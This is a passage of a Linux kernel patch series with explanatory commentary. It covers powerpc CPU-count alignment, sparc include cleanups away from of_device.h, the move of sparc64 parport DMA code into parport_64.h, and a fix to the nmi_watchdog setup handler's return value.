++		pr_warn("nr_cpu_ids was not a multiple of threads_per_core, adjusted to %d\n",
++			nr_cpu_ids);
++	}
++
++	if (boot_cpuid >= nr_cpu_ids) {
++		set_nr_cpu_ids(min(CONFIG_NR_CPUS, ALIGN(boot_cpuid + 1, nthreads)));
++		pr_warn("Boot CPU %d >= nr_cpu_ids, adjusted nr_cpu_ids to %d\n",
++			boot_cpuid, nr_cpu_ids);
++	}
++
+ 	/*
+ 	 * PAPR defines "logical" PVR values for cpus that
+ 	 * meet various levels of the architecture:
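early_init_dt_scan_cpus() now rounds nr_cpu_ids up to a whole number of SMT threads, and grows it further if the boot CPU would otherwise fall outside the range, so later per-core logic never sees a partially populated core. ALIGN() here is the usual round-up-to-multiple; a tiny sketch of the arithmetic (generic division form, since the kernel macro assumes a power-of-two alignment):

    #include <stdio.h>

    /* Round x up to the next multiple of a. The kernel's ALIGN() does
     * this with masking and therefore requires a power-of-two a. */
    #define ALIGN_UP(x, a) ((((x) + (a) - 1) / (a)) * (a))

    int main(void)
    {
        printf("%d\n", ALIGN_UP(6, 4));   /* nr_cpus=6, SMT4 -> 8 */
        return 0;
    }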
+diff --git a/arch/powerpc/lib/Makefile b/arch/powerpc/lib/Makefile
+index 9b394bab17eba..374b82cf13d9d 100644
+--- a/arch/powerpc/lib/Makefile
++++ b/arch/powerpc/lib/Makefile
+@@ -72,7 +72,7 @@ obj-$(CONFIG_PPC_LIB_RHEAP) += rheap.o
+ obj-$(CONFIG_FTR_FIXUP_SELFTEST) += feature-fixups-test.o
+ 
+ obj-$(CONFIG_ALTIVEC)	+= xor_vmx.o xor_vmx_glue.o
+-CFLAGS_xor_vmx.o += -maltivec $(call cc-option,-mabi=altivec)
++CFLAGS_xor_vmx.o += -mhard-float -maltivec $(call cc-option,-mabi=altivec)
+ # Enable <altivec.h>
+ CFLAGS_xor_vmx.o += -isystem $(shell $(CC) -print-file-name=include)
+ 
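Adding -mhard-float for xor_vmx.o placates toolchains that refuse -maltivec in combination with the kernel's global soft-float setting; the AltiVec XOR code never touches scalar FP state, so the flag only affects what the compiler is willing to accept.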
+diff --git a/arch/sparc/crypto/crop_devid.c b/arch/sparc/crypto/crop_devid.c
+index 83fc4536dcd57..93f4e0fdd38c1 100644
+--- a/arch/sparc/crypto/crop_devid.c
++++ b/arch/sparc/crypto/crop_devid.c
+@@ -1,6 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0
++#include <linux/mod_devicetable.h>
+ #include <linux/module.h>
+-#include <linux/of_device.h>
+ 
+ /* This is a dummy device table linked into all of the crypto
+  * opcode drivers.  It serves to trigger the module autoloading
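The long run of sparc hunks that follows is an include cleanup: files stop pulling in <linux/of_device.h> and instead include what they actually use (<linux/of.h>, <linux/of_platform.h>, <linux/platform_device.h>, <linux/mod_devicetable.h>). This tracks the treewide effort to disentangle of_device.h, and is presumably backported here so the functional sparc fixes later in this series apply cleanly.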
+diff --git a/arch/sparc/include/asm/floppy_32.h b/arch/sparc/include/asm/floppy_32.h
+index e10ab9ad3097d..836f6575aa1d7 100644
+--- a/arch/sparc/include/asm/floppy_32.h
++++ b/arch/sparc/include/asm/floppy_32.h
+@@ -8,7 +8,7 @@
+ #define __ASM_SPARC_FLOPPY_H
+ 
+ #include <linux/of.h>
+-#include <linux/of_device.h>
++#include <linux/of_platform.h>
+ #include <linux/pgtable.h>
+ 
+ #include <asm/idprom.h>
+diff --git a/arch/sparc/include/asm/floppy_64.h b/arch/sparc/include/asm/floppy_64.h
+index 070c8c1f5c8fd..6efeb24b0a92c 100644
+--- a/arch/sparc/include/asm/floppy_64.h
++++ b/arch/sparc/include/asm/floppy_64.h
+@@ -11,7 +11,7 @@
+ #define __ASM_SPARC64_FLOPPY_H
+ 
+ #include <linux/of.h>
+-#include <linux/of_device.h>
++#include <linux/of_platform.h>
+ #include <linux/dma-mapping.h>
+ 
+ #include <asm/auxio.h>
+diff --git a/arch/sparc/include/asm/parport.h b/arch/sparc/include/asm/parport.h
+index 03b27090c0c8c..e2eed8f97665f 100644
+--- a/arch/sparc/include/asm/parport.h
++++ b/arch/sparc/include/asm/parport.h
+@@ -1,255 +1,11 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+-/* parport.h: sparc64 specific parport initialization and dma.
+- *
+- * Copyright (C) 1999  Eddie C. Dost  (ecd@skynet.be)
+- */
++#ifndef ___ASM_SPARC_PARPORT_H
++#define ___ASM_SPARC_PARPORT_H
+ 
+-#ifndef _ASM_SPARC64_PARPORT_H
+-#define _ASM_SPARC64_PARPORT_H 1
+-
+-#include <linux/of_device.h>
+-
+-#include <asm/ebus_dma.h>
+-#include <asm/ns87303.h>
+-#include <asm/prom.h>
+-
+-#define PARPORT_PC_MAX_PORTS	PARPORT_MAX
+-
+-/*
+- * While sparc64 doesn't have an ISA DMA API, we provide something that looks
+- * close enough to make parport_pc happy
+- */
+-#define HAS_DMA
+-
+-#ifdef CONFIG_PARPORT_PC_FIFO
+-static DEFINE_SPINLOCK(dma_spin_lock);
+-
+-#define claim_dma_lock() \
+-({	unsigned long flags; \
+-	spin_lock_irqsave(&dma_spin_lock, flags); \
+-	flags; \
+-})
+-
+-#define release_dma_lock(__flags) \
+-	spin_unlock_irqrestore(&dma_spin_lock, __flags);
++#if defined(__sparc__) && defined(__arch64__)
++#include <asm/parport_64.h>
++#else
++#include <asm-generic/parport.h>
++#endif
+ #endif
+ 
+-static struct sparc_ebus_info {
+-	struct ebus_dma_info info;
+-	unsigned int addr;
+-	unsigned int count;
+-	int lock;
+-
+-	struct parport *port;
+-} sparc_ebus_dmas[PARPORT_PC_MAX_PORTS];
+-
+-static DECLARE_BITMAP(dma_slot_map, PARPORT_PC_MAX_PORTS);
+-
+-static inline int request_dma(unsigned int dmanr, const char *device_id)
+-{
+-	if (dmanr >= PARPORT_PC_MAX_PORTS)
+-		return -EINVAL;
+-	if (xchg(&sparc_ebus_dmas[dmanr].lock, 1) != 0)
+-		return -EBUSY;
+-	return 0;
+-}
+-
+-static inline void free_dma(unsigned int dmanr)
+-{
+-	if (dmanr >= PARPORT_PC_MAX_PORTS) {
+-		printk(KERN_WARNING "Trying to free DMA%d\n", dmanr);
+-		return;
+-	}
+-	if (xchg(&sparc_ebus_dmas[dmanr].lock, 0) == 0) {
+-		printk(KERN_WARNING "Trying to free free DMA%d\n", dmanr);
+-		return;
+-	}
+-}
+-
+-static inline void enable_dma(unsigned int dmanr)
+-{
+-	ebus_dma_enable(&sparc_ebus_dmas[dmanr].info, 1);
+-
+-	if (ebus_dma_request(&sparc_ebus_dmas[dmanr].info,
+-			     sparc_ebus_dmas[dmanr].addr,
+-			     sparc_ebus_dmas[dmanr].count))
+-		BUG();
+-}
+-
+-static inline void disable_dma(unsigned int dmanr)
+-{
+-	ebus_dma_enable(&sparc_ebus_dmas[dmanr].info, 0);
+-}
+-
+-static inline void clear_dma_ff(unsigned int dmanr)
+-{
+-	/* nothing */
+-}
+-
+-static inline void set_dma_mode(unsigned int dmanr, char mode)
+-{
+-	ebus_dma_prepare(&sparc_ebus_dmas[dmanr].info, (mode != DMA_MODE_WRITE));
+-}
+-
+-static inline void set_dma_addr(unsigned int dmanr, unsigned int addr)
+-{
+-	sparc_ebus_dmas[dmanr].addr = addr;
+-}
+-
+-static inline void set_dma_count(unsigned int dmanr, unsigned int count)
+-{
+-	sparc_ebus_dmas[dmanr].count = count;
+-}
+-
+-static inline unsigned int get_dma_residue(unsigned int dmanr)
+-{
+-	return ebus_dma_residue(&sparc_ebus_dmas[dmanr].info);
+-}
+-
+-static int ecpp_probe(struct platform_device *op)
+-{
+-	unsigned long base = op->resource[0].start;
+-	unsigned long config = op->resource[1].start;
+-	unsigned long d_base = op->resource[2].start;
+-	unsigned long d_len;
+-	struct device_node *parent;
+-	struct parport *p;
+-	int slot, err;
+-
+-	parent = op->dev.of_node->parent;
+-	if (of_node_name_eq(parent, "dma")) {
+-		p = parport_pc_probe_port(base, base + 0x400,
+-					  op->archdata.irqs[0], PARPORT_DMA_NOFIFO,
+-					  op->dev.parent->parent, 0);
+-		if (!p)
+-			return -ENOMEM;
+-		dev_set_drvdata(&op->dev, p);
+-		return 0;
+-	}
+-
+-	for (slot = 0; slot < PARPORT_PC_MAX_PORTS; slot++) {
+-		if (!test_and_set_bit(slot, dma_slot_map))
+-			break;
+-	}
+-	err = -ENODEV;
+-	if (slot >= PARPORT_PC_MAX_PORTS)
+-		goto out_err;
+-
+-	spin_lock_init(&sparc_ebus_dmas[slot].info.lock);
+-
+-	d_len = (op->resource[2].end - d_base) + 1UL;
+-	sparc_ebus_dmas[slot].info.regs =
+-		of_ioremap(&op->resource[2], 0, d_len, "ECPP DMA");
+-
+-	if (!sparc_ebus_dmas[slot].info.regs)
+-		goto out_clear_map;
+-
+-	sparc_ebus_dmas[slot].info.flags = 0;
+-	sparc_ebus_dmas[slot].info.callback = NULL;
+-	sparc_ebus_dmas[slot].info.client_cookie = NULL;
+-	sparc_ebus_dmas[slot].info.irq = 0xdeadbeef;
+-	strcpy(sparc_ebus_dmas[slot].info.name, "parport");
+-	if (ebus_dma_register(&sparc_ebus_dmas[slot].info))
+-		goto out_unmap_regs;
+-
+-	ebus_dma_irq_enable(&sparc_ebus_dmas[slot].info, 1);
+-
+-	/* Configure IRQ to Push Pull, Level Low */
+-	/* Enable ECP, set bit 2 of the CTR first */
+-	outb(0x04, base + 0x02);
+-	ns87303_modify(config, PCR,
+-		       PCR_EPP_ENABLE |
+-		       PCR_IRQ_ODRAIN,
+-		       PCR_ECP_ENABLE |
+-		       PCR_ECP_CLK_ENA |
+-		       PCR_IRQ_POLAR);
+-
+-	/* CTR bit 5 controls direction of port */
+-	ns87303_modify(config, PTR,
+-		       0, PTR_LPT_REG_DIR);
+-
+-	p = parport_pc_probe_port(base, base + 0x400,
+-				  op->archdata.irqs[0],
+-				  slot,
+-				  op->dev.parent,
+-				  0);
+-	err = -ENOMEM;
+-	if (!p)
+-		goto out_disable_irq;
+-
+-	dev_set_drvdata(&op->dev, p);
+-
+-	return 0;
+-
+-out_disable_irq:
+-	ebus_dma_irq_enable(&sparc_ebus_dmas[slot].info, 0);
+-	ebus_dma_unregister(&sparc_ebus_dmas[slot].info);
+-
+-out_unmap_regs:
+-	of_iounmap(&op->resource[2], sparc_ebus_dmas[slot].info.regs, d_len);
+-
+-out_clear_map:
+-	clear_bit(slot, dma_slot_map);
+-
+-out_err:
+-	return err;
+-}
+-
+-static int ecpp_remove(struct platform_device *op)
+-{
+-	struct parport *p = dev_get_drvdata(&op->dev);
+-	int slot = p->dma;
+-
+-	parport_pc_unregister_port(p);
+-
+-	if (slot != PARPORT_DMA_NOFIFO) {
+-		unsigned long d_base = op->resource[2].start;
+-		unsigned long d_len;
+-
+-		d_len = (op->resource[2].end - d_base) + 1UL;
+-
+-		ebus_dma_irq_enable(&sparc_ebus_dmas[slot].info, 0);
+-		ebus_dma_unregister(&sparc_ebus_dmas[slot].info);
+-		of_iounmap(&op->resource[2],
+-			   sparc_ebus_dmas[slot].info.regs,
+-			   d_len);
+-		clear_bit(slot, dma_slot_map);
+-	}
+-
+-	return 0;
+-}
+-
+-static const struct of_device_id ecpp_match[] = {
+-	{
+-		.name = "ecpp",
+-	},
+-	{
+-		.name = "parallel",
+-		.compatible = "ecpp",
+-	},
+-	{
+-		.name = "parallel",
+-		.compatible = "ns87317-ecpp",
+-	},
+-	{
+-		.name = "parallel",
+-		.compatible = "pnpALI,1533,3",
+-	},
+-	{},
+-};
+-
+-static struct platform_driver ecpp_driver = {
+-	.driver = {
+-		.name = "ecpp",
+-		.of_match_table = ecpp_match,
+-	},
+-	.probe			= ecpp_probe,
+-	.remove			= ecpp_remove,
+-};
+-
+-static int parport_pc_find_nonpci_ports(int autoirq, int autodma)
+-{
+-	return platform_driver_register(&ecpp_driver);
+-}
+-
+-#endif /* !(_ASM_SPARC64_PARPORT_H */
+diff --git a/arch/sparc/include/asm/parport_64.h b/arch/sparc/include/asm/parport_64.h
+new file mode 100644
+index 0000000000000..0a7ffcfd59cda
+--- /dev/null
++++ b/arch/sparc/include/asm/parport_64.h
+@@ -0,0 +1,256 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/* parport.h: sparc64 specific parport initialization and dma.
++ *
++ * Copyright (C) 1999  Eddie C. Dost  (ecd@skynet.be)
++ */
++
++#ifndef _ASM_SPARC64_PARPORT_H
++#define _ASM_SPARC64_PARPORT_H 1
++
++#include <linux/of.h>
++#include <linux/platform_device.h>
++
++#include <asm/ebus_dma.h>
++#include <asm/ns87303.h>
++#include <asm/prom.h>
++
++#define PARPORT_PC_MAX_PORTS	PARPORT_MAX
++
++/*
++ * While sparc64 doesn't have an ISA DMA API, we provide something that looks
++ * close enough to make parport_pc happy
++ */
++#define HAS_DMA
++
++#ifdef CONFIG_PARPORT_PC_FIFO
++static DEFINE_SPINLOCK(dma_spin_lock);
++
++#define claim_dma_lock() \
++({	unsigned long flags; \
++	spin_lock_irqsave(&dma_spin_lock, flags); \
++	flags; \
++})
++
++#define release_dma_lock(__flags) \
++	spin_unlock_irqrestore(&dma_spin_lock, __flags);
++#endif
++
++static struct sparc_ebus_info {
++	struct ebus_dma_info info;
++	unsigned int addr;
++	unsigned int count;
++	int lock;
++
++	struct parport *port;
++} sparc_ebus_dmas[PARPORT_PC_MAX_PORTS];
++
++static DECLARE_BITMAP(dma_slot_map, PARPORT_PC_MAX_PORTS);
++
++static inline int request_dma(unsigned int dmanr, const char *device_id)
++{
++	if (dmanr >= PARPORT_PC_MAX_PORTS)
++		return -EINVAL;
++	if (xchg(&sparc_ebus_dmas[dmanr].lock, 1) != 0)
++		return -EBUSY;
++	return 0;
++}
++
++static inline void free_dma(unsigned int dmanr)
++{
++	if (dmanr >= PARPORT_PC_MAX_PORTS) {
++		printk(KERN_WARNING "Trying to free DMA%d\n", dmanr);
++		return;
++	}
++	if (xchg(&sparc_ebus_dmas[dmanr].lock, 0) == 0) {
++		printk(KERN_WARNING "Trying to free free DMA%d\n", dmanr);
++		return;
++	}
++}
++
++static inline void enable_dma(unsigned int dmanr)
++{
++	ebus_dma_enable(&sparc_ebus_dmas[dmanr].info, 1);
++
++	if (ebus_dma_request(&sparc_ebus_dmas[dmanr].info,
++			     sparc_ebus_dmas[dmanr].addr,
++			     sparc_ebus_dmas[dmanr].count))
++		BUG();
++}
++
++static inline void disable_dma(unsigned int dmanr)
++{
++	ebus_dma_enable(&sparc_ebus_dmas[dmanr].info, 0);
++}
++
++static inline void clear_dma_ff(unsigned int dmanr)
++{
++	/* nothing */
++}
++
++static inline void set_dma_mode(unsigned int dmanr, char mode)
++{
++	ebus_dma_prepare(&sparc_ebus_dmas[dmanr].info, (mode != DMA_MODE_WRITE));
++}
++
++static inline void set_dma_addr(unsigned int dmanr, unsigned int addr)
++{
++	sparc_ebus_dmas[dmanr].addr = addr;
++}
++
++static inline void set_dma_count(unsigned int dmanr, unsigned int count)
++{
++	sparc_ebus_dmas[dmanr].count = count;
++}
++
++static inline unsigned int get_dma_residue(unsigned int dmanr)
++{
++	return ebus_dma_residue(&sparc_ebus_dmas[dmanr].info);
++}
++
++static int ecpp_probe(struct platform_device *op)
++{
++	unsigned long base = op->resource[0].start;
++	unsigned long config = op->resource[1].start;
++	unsigned long d_base = op->resource[2].start;
++	unsigned long d_len;
++	struct device_node *parent;
++	struct parport *p;
++	int slot, err;
++
++	parent = op->dev.of_node->parent;
++	if (of_node_name_eq(parent, "dma")) {
++		p = parport_pc_probe_port(base, base + 0x400,
++					  op->archdata.irqs[0], PARPORT_DMA_NOFIFO,
++					  op->dev.parent->parent, 0);
++		if (!p)
++			return -ENOMEM;
++		dev_set_drvdata(&op->dev, p);
++		return 0;
++	}
++
++	for (slot = 0; slot < PARPORT_PC_MAX_PORTS; slot++) {
++		if (!test_and_set_bit(slot, dma_slot_map))
++			break;
++	}
++	err = -ENODEV;
++	if (slot >= PARPORT_PC_MAX_PORTS)
++		goto out_err;
++
++	spin_lock_init(&sparc_ebus_dmas[slot].info.lock);
++
++	d_len = (op->resource[2].end - d_base) + 1UL;
++	sparc_ebus_dmas[slot].info.regs =
++		of_ioremap(&op->resource[2], 0, d_len, "ECPP DMA");
++
++	if (!sparc_ebus_dmas[slot].info.regs)
++		goto out_clear_map;
++
++	sparc_ebus_dmas[slot].info.flags = 0;
++	sparc_ebus_dmas[slot].info.callback = NULL;
++	sparc_ebus_dmas[slot].info.client_cookie = NULL;
++	sparc_ebus_dmas[slot].info.irq = 0xdeadbeef;
++	strcpy(sparc_ebus_dmas[slot].info.name, "parport");
++	if (ebus_dma_register(&sparc_ebus_dmas[slot].info))
++		goto out_unmap_regs;
++
++	ebus_dma_irq_enable(&sparc_ebus_dmas[slot].info, 1);
++
++	/* Configure IRQ to Push Pull, Level Low */
++	/* Enable ECP, set bit 2 of the CTR first */
++	outb(0x04, base + 0x02);
++	ns87303_modify(config, PCR,
++		       PCR_EPP_ENABLE |
++		       PCR_IRQ_ODRAIN,
++		       PCR_ECP_ENABLE |
++		       PCR_ECP_CLK_ENA |
++		       PCR_IRQ_POLAR);
++
++	/* CTR bit 5 controls direction of port */
++	ns87303_modify(config, PTR,
++		       0, PTR_LPT_REG_DIR);
++
++	p = parport_pc_probe_port(base, base + 0x400,
++				  op->archdata.irqs[0],
++				  slot,
++				  op->dev.parent,
++				  0);
++	err = -ENOMEM;
++	if (!p)
++		goto out_disable_irq;
++
++	dev_set_drvdata(&op->dev, p);
++
++	return 0;
++
++out_disable_irq:
++	ebus_dma_irq_enable(&sparc_ebus_dmas[slot].info, 0);
++	ebus_dma_unregister(&sparc_ebus_dmas[slot].info);
++
++out_unmap_regs:
++	of_iounmap(&op->resource[2], sparc_ebus_dmas[slot].info.regs, d_len);
++
++out_clear_map:
++	clear_bit(slot, dma_slot_map);
++
++out_err:
++	return err;
++}
++
++static int ecpp_remove(struct platform_device *op)
++{
++	struct parport *p = dev_get_drvdata(&op->dev);
++	int slot = p->dma;
++
++	parport_pc_unregister_port(p);
++
++	if (slot != PARPORT_DMA_NOFIFO) {
++		unsigned long d_base = op->resource[2].start;
++		unsigned long d_len;
++
++		d_len = (op->resource[2].end - d_base) + 1UL;
++
++		ebus_dma_irq_enable(&sparc_ebus_dmas[slot].info, 0);
++		ebus_dma_unregister(&sparc_ebus_dmas[slot].info);
++		of_iounmap(&op->resource[2],
++			   sparc_ebus_dmas[slot].info.regs,
++			   d_len);
++		clear_bit(slot, dma_slot_map);
++	}
++
++	return 0;
++}
++
++static const struct of_device_id ecpp_match[] = {
++	{
++		.name = "ecpp",
++	},
++	{
++		.name = "parallel",
++		.compatible = "ecpp",
++	},
++	{
++		.name = "parallel",
++		.compatible = "ns87317-ecpp",
++	},
++	{
++		.name = "parallel",
++		.compatible = "pnpALI,1533,3",
++	},
++	{},
++};
++
++static struct platform_driver ecpp_driver = {
++	.driver = {
++		.name = "ecpp",
++		.of_match_table = ecpp_match,
++	},
++	.probe			= ecpp_probe,
++	.remove			= ecpp_remove,
++};
++
++static int parport_pc_find_nonpci_ports(int autoirq, int autodma)
++{
++	return platform_driver_register(&ecpp_driver);
++}
++
++#endif /* !(_ASM_SPARC64_PARPORT_H */
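asm/parport.h becomes a thin dispatch header: sparc64 builds get the old ebus-DMA implementation moved verbatim into the new parport_64.h (with the of_device.h include replaced by <linux/of.h> and <linux/platform_device.h>), while sparc32 falls back to asm-generic/parport.h. Because the body moved unmodified, even the unbalanced "!(" in the closing #endif comment travels with it.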
+diff --git a/arch/sparc/kernel/apc.c b/arch/sparc/kernel/apc.c
+index ecd05bc0a1045..d44725d37e30f 100644
+--- a/arch/sparc/kernel/apc.c
++++ b/arch/sparc/kernel/apc.c
+@@ -13,7 +13,7 @@
+ #include <linux/miscdevice.h>
+ #include <linux/pm.h>
+ #include <linux/of.h>
+-#include <linux/of_device.h>
++#include <linux/platform_device.h>
+ #include <linux/module.h>
+ 
+ #include <asm/io.h>
+diff --git a/arch/sparc/kernel/auxio_32.c b/arch/sparc/kernel/auxio_32.c
+index a32d588174f2f..989860e890c4f 100644
+--- a/arch/sparc/kernel/auxio_32.c
++++ b/arch/sparc/kernel/auxio_32.c
+@@ -8,7 +8,6 @@
+ #include <linux/init.h>
+ #include <linux/spinlock.h>
+ #include <linux/of.h>
+-#include <linux/of_device.h>
+ #include <linux/export.h>
+ 
+ #include <asm/oplib.h>
+diff --git a/arch/sparc/kernel/auxio_64.c b/arch/sparc/kernel/auxio_64.c
+index 774a82b0c649f..2a2800d213256 100644
+--- a/arch/sparc/kernel/auxio_64.c
++++ b/arch/sparc/kernel/auxio_64.c
+@@ -10,7 +10,8 @@
+ #include <linux/kernel.h>
+ #include <linux/init.h>
+ #include <linux/ioport.h>
+-#include <linux/of_device.h>
++#include <linux/of.h>
++#include <linux/platform_device.h>
+ 
+ #include <asm/prom.h>
+ #include <asm/io.h>
+diff --git a/arch/sparc/kernel/central.c b/arch/sparc/kernel/central.c
+index 23f8838dd96e3..a1a6485c91831 100644
+--- a/arch/sparc/kernel/central.c
++++ b/arch/sparc/kernel/central.c
+@@ -10,7 +10,7 @@
+ #include <linux/export.h>
+ #include <linux/string.h>
+ #include <linux/init.h>
+-#include <linux/of_device.h>
++#include <linux/of.h>
+ #include <linux/platform_device.h>
+ 
+ #include <asm/fhc.h>
+diff --git a/arch/sparc/kernel/chmc.c b/arch/sparc/kernel/chmc.c
+index 6ff43df740e08..d5fad5fb04c1d 100644
+--- a/arch/sparc/kernel/chmc.c
++++ b/arch/sparc/kernel/chmc.c
+@@ -15,7 +15,8 @@
+ #include <linux/errno.h>
+ #include <linux/init.h>
+ #include <linux/of.h>
+-#include <linux/of_device.h>
++#include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ #include <asm/spitfire.h>
+ #include <asm/chmctrl.h>
+ #include <asm/cpudata.h>
+diff --git a/arch/sparc/kernel/ioport.c b/arch/sparc/kernel/ioport.c
+index 4e4f3d3263e46..e5a327799e574 100644
+--- a/arch/sparc/kernel/ioport.c
++++ b/arch/sparc/kernel/ioport.c
+@@ -39,7 +39,7 @@
+ #include <linux/seq_file.h>
+ #include <linux/scatterlist.h>
+ #include <linux/dma-map-ops.h>
+-#include <linux/of_device.h>
++#include <linux/of.h>
+ 
+ #include <asm/io.h>
+ #include <asm/vaddrs.h>
+diff --git a/arch/sparc/kernel/leon_kernel.c b/arch/sparc/kernel/leon_kernel.c
+index 39229940d725d..4c61da491fee1 100644
+--- a/arch/sparc/kernel/leon_kernel.c
++++ b/arch/sparc/kernel/leon_kernel.c
+@@ -8,9 +8,7 @@
+ #include <linux/errno.h>
+ #include <linux/mutex.h>
+ #include <linux/of.h>
+-#include <linux/of_platform.h>
+ #include <linux/interrupt.h>
+-#include <linux/of_device.h>
+ #include <linux/clocksource.h>
+ #include <linux/clockchips.h>
+ 
+diff --git a/arch/sparc/kernel/leon_pci.c b/arch/sparc/kernel/leon_pci.c
+index e5e5ff6b9a5c5..3a73bc466f95d 100644
+--- a/arch/sparc/kernel/leon_pci.c
++++ b/arch/sparc/kernel/leon_pci.c
+@@ -7,7 +7,8 @@
+  * Code is partially derived from pcic.c
+  */
+ 
+-#include <linux/of_device.h>
++#include <linux/of.h>
++#include <linux/platform_device.h>
+ #include <linux/kernel.h>
+ #include <linux/pci.h>
+ #include <linux/export.h>
+diff --git a/arch/sparc/kernel/leon_pci_grpci1.c b/arch/sparc/kernel/leon_pci_grpci1.c
+index c32590bdd3120..b2b639bee0684 100644
+--- a/arch/sparc/kernel/leon_pci_grpci1.c
++++ b/arch/sparc/kernel/leon_pci_grpci1.c
+@@ -13,10 +13,11 @@
+  * Contributors: Daniel Hellstrom <daniel@gaisler.com>
+  */
+ 
+-#include <linux/of_device.h>
+ #include <linux/export.h>
+ #include <linux/kernel.h>
++#include <linux/of.h>
+ #include <linux/of_irq.h>
++#include <linux/platform_device.h>
+ #include <linux/delay.h>
+ #include <linux/pci.h>
+ 
+diff --git a/arch/sparc/kernel/leon_pci_grpci2.c b/arch/sparc/kernel/leon_pci_grpci2.c
+index dd06abc61657f..ac2acd62a24ec 100644
+--- a/arch/sparc/kernel/leon_pci_grpci2.c
++++ b/arch/sparc/kernel/leon_pci_grpci2.c
+@@ -6,12 +6,14 @@
+  *
+  */
+ 
+-#include <linux/of_device.h>
+ #include <linux/kernel.h>
+ #include <linux/pci.h>
+ #include <linux/slab.h>
+ #include <linux/delay.h>
+ #include <linux/export.h>
++#include <linux/of.h>
++#include <linux/platform_device.h>
++
+ #include <asm/io.h>
+ #include <asm/leon.h>
+ #include <asm/vaddrs.h>
+diff --git a/arch/sparc/kernel/nmi.c b/arch/sparc/kernel/nmi.c
+index 060fff95a305c..fbf25e926f67c 100644
+--- a/arch/sparc/kernel/nmi.c
++++ b/arch/sparc/kernel/nmi.c
+@@ -274,7 +274,7 @@ static int __init setup_nmi_watchdog(char *str)
+ 	if (!strncmp(str, "panic", 5))
+ 		panic_on_timeout = 1;
+ 
+-	return 0;
++	return 1;
+ }
+ __setup("nmi_watchdog=", setup_nmi_watchdog);
+ 
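The setup_nmi_watchdog() change is about the __setup() contract: a handler returns 1 to mark the option consumed, while returning 0 tells the kernel the string was not recognized, so it gets passed to init as an argument or environment variable and triggers an "Unknown kernel command line parameters" warning. A sketch of the idiom (kernel context, hypothetical names):

    #include <linux/init.h>
    #include <linux/kernel.h>

    static unsigned long example_val;

    /* __setup() handlers return 1 when the option was handled;
     * returning 0 means "not mine" and the string leaks through
     * to init's argv/envp. */
    static int __init example_setup(char *str)
    {
            if (kstrtoul(str, 10, &example_val))
                    pr_warn("example=: ignoring bad value '%s'\n", str);
            return 1;
    }
    __setup("example=", example_setup);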
+diff --git a/arch/sparc/kernel/of_device_32.c b/arch/sparc/kernel/of_device_32.c
+index 4ebf51e6e78ec..9ac6853b34c1b 100644
+--- a/arch/sparc/kernel/of_device_32.c
++++ b/arch/sparc/kernel/of_device_32.c
+@@ -7,8 +7,8 @@
+ #include <linux/slab.h>
+ #include <linux/errno.h>
+ #include <linux/irq.h>
+-#include <linux/of_device.h>
+ #include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ #include <linux/dma-mapping.h>
+ #include <asm/leon.h>
+ #include <asm/leon_amba.h>
+diff --git a/arch/sparc/kernel/of_device_64.c b/arch/sparc/kernel/of_device_64.c
+index 5a9f86b1d4e7e..a8ccd7260fe7f 100644
+--- a/arch/sparc/kernel/of_device_64.c
++++ b/arch/sparc/kernel/of_device_64.c
+@@ -1,7 +1,6 @@
+ // SPDX-License-Identifier: GPL-2.0
+ #include <linux/string.h>
+ #include <linux/kernel.h>
+-#include <linux/of.h>
+ #include <linux/dma-mapping.h>
+ #include <linux/init.h>
+ #include <linux/export.h>
+@@ -9,8 +8,9 @@
+ #include <linux/slab.h>
+ #include <linux/errno.h>
+ #include <linux/irq.h>
+-#include <linux/of_device.h>
++#include <linux/of.h>
+ #include <linux/of_platform.h>
++#include <linux/platform_device.h>
+ #include <asm/spitfire.h>
+ 
+ #include "of_device_common.h"
+diff --git a/arch/sparc/kernel/of_device_common.c b/arch/sparc/kernel/of_device_common.c
+index e717a56efc5d3..a09724381bd40 100644
+--- a/arch/sparc/kernel/of_device_common.c
++++ b/arch/sparc/kernel/of_device_common.c
+@@ -1,15 +1,15 @@
+ // SPDX-License-Identifier: GPL-2.0-only
+ #include <linux/string.h>
+ #include <linux/kernel.h>
+-#include <linux/of.h>
+ #include <linux/export.h>
+ #include <linux/mod_devicetable.h>
+ #include <linux/errno.h>
+ #include <linux/irq.h>
++#include <linux/of.h>
+ #include <linux/of_platform.h>
+ #include <linux/of_address.h>
+-#include <linux/of_device.h>
+ #include <linux/of_irq.h>
++#include <linux/platform_device.h>
+ 
+ #include "of_device_common.h"
+ 
+diff --git a/arch/sparc/kernel/pci.c b/arch/sparc/kernel/pci.c
+index cb1ef25116e94..5637b37ba9114 100644
+--- a/arch/sparc/kernel/pci.c
++++ b/arch/sparc/kernel/pci.c
+@@ -20,8 +20,9 @@
+ #include <linux/irq.h>
+ #include <linux/init.h>
+ #include <linux/of.h>
+-#include <linux/of_device.h>
++#include <linux/of_platform.h>
+ #include <linux/pgtable.h>
++#include <linux/platform_device.h>
+ 
+ #include <linux/uaccess.h>
+ #include <asm/irq.h>
+diff --git a/arch/sparc/kernel/pci_common.c b/arch/sparc/kernel/pci_common.c
+index 4759ccd542fe6..5eeec9ad68457 100644
+--- a/arch/sparc/kernel/pci_common.c
++++ b/arch/sparc/kernel/pci_common.c
+@@ -8,7 +8,8 @@
+ #include <linux/slab.h>
+ #include <linux/pci.h>
+ #include <linux/device.h>
+-#include <linux/of_device.h>
++#include <linux/of.h>
++#include <linux/platform_device.h>
+ 
+ #include <asm/prom.h>
+ #include <asm/oplib.h>
+diff --git a/arch/sparc/kernel/pci_fire.c b/arch/sparc/kernel/pci_fire.c
+index 0ca08d455e805..0b91bde80fdc5 100644
+--- a/arch/sparc/kernel/pci_fire.c
++++ b/arch/sparc/kernel/pci_fire.c
+@@ -10,7 +10,8 @@
+ #include <linux/msi.h>
+ #include <linux/export.h>
+ #include <linux/irq.h>
+-#include <linux/of_device.h>
++#include <linux/of.h>
++#include <linux/platform_device.h>
+ #include <linux/numa.h>
+ 
+ #include <asm/prom.h>
+diff --git a/arch/sparc/kernel/pci_impl.h b/arch/sparc/kernel/pci_impl.h
+index 4e3d15189fa95..f31761f517575 100644
+--- a/arch/sparc/kernel/pci_impl.h
++++ b/arch/sparc/kernel/pci_impl.h
+@@ -11,7 +11,6 @@
+ #include <linux/spinlock.h>
+ #include <linux/pci.h>
+ #include <linux/msi.h>
+-#include <linux/of_device.h>
+ #include <asm/io.h>
+ #include <asm/prom.h>
+ #include <asm/iommu.h>
